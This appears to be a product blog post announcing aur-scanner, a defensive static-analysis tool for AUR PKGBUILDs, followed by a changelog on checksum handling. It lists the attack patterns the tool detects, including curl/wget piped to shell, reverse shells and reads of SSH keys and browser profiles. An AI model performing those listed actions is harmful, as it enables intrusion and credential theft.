Introducing aur-scanner: A Security Scanner for AUR Packages
We released `aur-scanner` today - a tool that scans AUR packages for malicious patterns before installation.
Now available on the Arch User Repository.
We released aur-scanner today - a tool that scans AUR packages for malicious patterns before installation.
Background
The Arch User Repository relies on users manually reviewing PKGBUILDs before installation. This works when packages are simple, but modern PKGBUILDs can be complex, and obfuscation techniques make malicious code difficult to spot.
Recent incidents have highlighted the risks:
- July 2025: Packages like
librewolf-fix-binandfirefox-patch-binwere found distributing CHAOS RAT malware. - 2018: Orphaned packages including
acroreadwere hijacked to deploy cryptominers.
We wanted a tool that could automate the initial review process.
What It Does
aur-scanner performs static analysis on PKGBUILD files to flag known malicious patterns:
- Download-and-execute attacks (curl/wget piped to shell)
- Reverse shells and backdoors
- Credential access (SSH keys, browser profiles)
- Obfuscation (base64, hex encoding, eval)
- Privilege escalation patterns
It includes 50+ detection rules based on documented attacks against the AUR.
Usage
# Install from AUR
paru -S aur-scanner-git
# Check a package before installing
aur-scan check <package-name>
# Scan a local PKGBUILD
aur-scan scan ./PKGBUILD
The tool also integrates as a pacman hook for automatic scanning during package transactions.
Limitations
This is static analysis - it catches known patterns but won't detect novel attacks or sophisticated obfuscation. It's meant to complement manual review, not replace it.
Links
- AUR: aur-scanner-git
- GitHub: KiefStudioMA/ks-aur-scanner
- License: GPL-3.0-or-later
Feedback and contributions welcome via GitHub issues.
Kief Studio - https://kief.studio
Changelog
aur-scanner v0.1.1
aur-scanner v0.1.1: VCS Checksum Handling & Stable Releases
Released December 3, 2025
Version 0.1.1 addresses a false positive issue with VCS sources and introduces stable release packages on the AUR.
What's New
VCS Checksum Detection Fix
The scanner now correctly handles SKIP checksums for VCS sources (git, svn, hg, bzr). Previously, packages using git sources would trigger checksum warnings even though SKIP is the correct and expected value for VCS sources - their content changes with each clone.
Before: A package like this would trigger a warning:
source=("git+https://github.com/user/repo.git")
sha256sums=('SKIP')
After: VCS sources with SKIP are correctly recognized as legitimate. Only non-VCS sources (tarballs, patches) using SKIP will trigger warnings.
New Stable Release Packages
We've added checksum-validated stable release packages to the AUR:
| Package | Description |
|---|---|
aur-scanner |
Stable release with SHA256 validation |
ks-aur-scanner |
Alternate name, same stable release |
aur-scanner-git |
Development version (existing) |
The stable packages download from tagged GitHub releases with verified checksums, while the -git package tracks the latest commits.
Detection Code Updates
New checksum-related detection codes:
CHK-001: No checksums for sources (High)CHK-002: MD5 checksums used (Medium)CHK-003: SHA1 checksums used (Medium)CHK-004: Some non-VCS sources use SKIP (Medium)CHK-005: All non-VCS sources use SKIP (High)CHK-006: Checksum count mismatch (High)
Installation
# Stable release (recommended)
paru -S aur-scanner
# or
yay -S aur-scanner
# Development version
paru -S aur-scanner-git
# or
yay -S aur-scanner-git
Links
- GitHub: KiefStudioMA/ks-aur-scanner
- AUR: aur-scanner
Kief Studio - https://kief.studio
Want More Insights Like This?
Join our newsletter for weekly expert perspectives on technology, AI, and business transformation
